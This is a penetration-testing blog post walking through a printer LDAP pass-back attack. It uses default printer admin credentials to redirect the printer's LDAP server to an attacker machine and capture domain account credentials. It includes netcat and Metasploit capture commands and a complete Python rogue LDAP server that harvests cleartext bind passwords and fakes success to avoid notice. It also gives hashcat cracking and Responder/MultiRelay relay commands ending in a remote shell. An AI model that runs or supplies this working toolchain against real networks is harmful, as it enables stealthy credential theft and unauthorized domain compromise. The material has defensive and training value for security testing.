Default credentials on critical systems such as public-facing portals (ERP systems, VPN gateways, firewall consoles, etc.) are something you would take seriously and act on immediately, right? What if the same were true of your printers? A lot of people consider default printer credentials trivial, something that won't cause any harm. Well, I thought the same until my buddy Seth showed me earlier last year how to use them to gain a foothold on a network. And interestingly enough, this is something we come across in almost every pentest engagement we are involved in.
First of all, locating default credentials is as easy as typing "printer name and model" + "default password" into Google.
Assuming nobody changed them, these will grant you access to the printer's web administration portal.
A lot of organizations integrate printers with their domain for authentication purposes (user sign-in at the device, address book lookups, scan-to-folder). Locate the LDAP configuration page of the printer. If you are lucky, the account configured there has domain admin privileges; even when it does not, it is a valid domain account whose password the printer has stored and is willing to use.
Change the LDAP server host name/IP address to your Kali Linux IP address and click the Test button. This makes the printer open a connection to the "authentication server", which is now the attacker's machine, and attempt to bind with the account configured on the LDAP page. What arrives depends on the bind method the printer is using: a simple bind over plain LDAP hands over the DN and password in cleartext, while an NTLM bind produces an NTLM challenge-response (Net-NTLMv2) for that account. Either way, you need some form of "authentication server" listening on the attacker's machine to capture what the printer sends.
You can set up a netcat listener on the port the printer was pointed at and dump whatever it sends (plain LDAP is port 389; the listener below is on 445). Netcat shows the raw bytes of the bind and does nothing more, which is enough for a cleartext simple bind but not for completing an NTLM exchange.
netcat -l -vv -p 445
Or use the Metasploit SMB capture module, which speaks enough SMB to complete the NTLM exchange and prints the captured Net-NTLMv2 in a crackable format (the module lives under auxiliary/server/capture, not auxiliary/scanner):
use auxiliary/server/capture/smb
run
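The cheapest capture server for the LDAP side of the procedure above, as an added example that is not part of the original post: a Python listener that decodes the BindRequest the printer sends when you click Test and answers with a successful BindResponse so the printer's test "passes" and the admin page shows nothing odd. If the printer uses a simple bind (the common configuration), the DN and password arrive in cleartext; if it uses an NTLM/Kerberos SASL bind, the script reports that rather than guessing, because that case is the challenge-response the listeners above are for. The service account DN and password in the built-in sample are constructed for the demo, and binding port 389 on Kali needs root.

```python
"""Rogue LDAP listener for a printer LDAP pass-back test (added example).

A printer doing a *simple* bind (RFC 4511) sends the configured account's DN
and password in cleartext inside the BindRequest. This script decodes that
request and replies with a successful BindResponse so the printer's "Test"
button reports success. A SASL (NTLM/Kerberos) bind is detected and reported,
not decoded: that case yields a challenge-response to crack or relay.
"""
import socket
import sys


def _read_tlv(buf, pos):
    """Decode one BER TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                   # long-form length
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    return tag, buf[pos:pos + length], pos + length


def _tlv(tag, value):
    """Encode one BER TLV, using long-form length when the value exceeds 127 bytes."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    lenbytes = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lenbytes)]) + lenbytes + value


def _int(n, tag=0x02):
    """BER INTEGER (or ENUMERATED with tag 0x0A); the extra byte keeps values >= 0x80 positive."""
    return _tlv(tag, n.to_bytes((n.bit_length() + 8) // 8, "big"))


def parse_bind_request(data):
    """Return (message_id, version, bind_dn, password) from a simple BindRequest.

    Raises ValueError for anything that is not a simple bind; a SASL bind
    (context tag 0xA3, e.g. GSS-SPNEGO/NTLM) carries no cleartext password.
    """
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = _read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = _read_tlv(msg, pos)
    if tag != 0x60:                                     # [APPLICATION 0] BindRequest
        raise ValueError("protocolOp is not a BindRequest (tag 0x%02x)" % tag)
    _, ver, pos = _read_tlv(op, 0)
    _, dn, pos = _read_tlv(op, pos)
    tag, cred, _ = _read_tlv(op, pos)
    if tag == 0xA3:
        raise ValueError("SASL bind: challenge-response, no cleartext password here")
    if tag != 0x80:                                     # [CONTEXT 0] simple password
        raise ValueError("unexpected authentication choice 0x%02x" % tag)
    return (int.from_bytes(mid, "big"), int.from_bytes(ver, "big"),
            dn.decode("utf-8"), cred.decode("utf-8"))


def build_bind_request(message_id, bind_dn, password, version=3):
    """Encode a simple BindRequest the way a printer would send it (offline test input)."""
    op = _int(version) + _tlv(0x04, bind_dn.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _int(message_id) + _tlv(0x60, op))


def build_bind_response(message_id, result_code=0):
    """BindResponse [APPLICATION 1] with resultCode (0 = success), empty matchedDN and message."""
    op = _int(result_code, tag=0x0A) + _tlv(0x04, b"") + _tlv(0x04, b"")
    return _tlv(0x30, _int(message_id) + _tlv(0x61, op))


def serve(bind_addr="0.0.0.0", port=389):
    """Accept one printer LDAP test, print what it sent, and answer success."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
            try:
                mid, ver, dn, pw = parse_bind_request(data)
                print("[+] %s  LDAPv%d simple bind  dn=%r  password=%r" % (peer[0], ver, dn, pw))
                conn.sendall(build_bind_response(mid))
            except ValueError as err:
                print("[-] %s: %s" % (peer[0], err))


if __name__ == "__main__":
    # Constructed sample of what a printer with a simple bind would send (not real credentials).
    sample = build_bind_request(1, "CN=svc-printer,OU=Service Accounts,DC=corp,DC=local", "Summer2019!")
    print(parse_bind_request(sample))
    if len(sys.argv) > 1:                               # e.g. sudo python3 rogue_ldap.py 389
        serve(port=int(sys.argv[1]))
```

Point the printer's LDAP server field at the Kali box, start the script on the port the printer expects (389 by default), and click Test; the DN and password land on stdout. Replying with a success BindResponse is deliberate: a failed test is what makes an admin go and look at the LDAP page.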
Having captured the account's NTLM challenge-response, you can either crack it the old-fashioned way (hashcat mode 5600 for Net-NTLMv2) or relay it to another host. Note that a captured challenge-response is not the NT hash, so it cannot be used for Pass-The-Hash on its own; that only becomes an option once the password is cracked or you dump the NT hash from a host you relayed into. My go-to tool for capture and SMB relaying is Responder. Fire up Responder.
And relay the received challenge-response to a host with SMB signing disabled using MultiRelay.py (shipped in Responder's tools directory), which serves the same purpose as Impacket's ntlmrelayx.py. Responder's own SMB server has to be turned off in Responder.conf first so that MultiRelay can take over port 445.
python MultiRelay.py -t <IP Address> -u administrator
And just like that you’ve got a shell!
Here is a visual representation of the attack.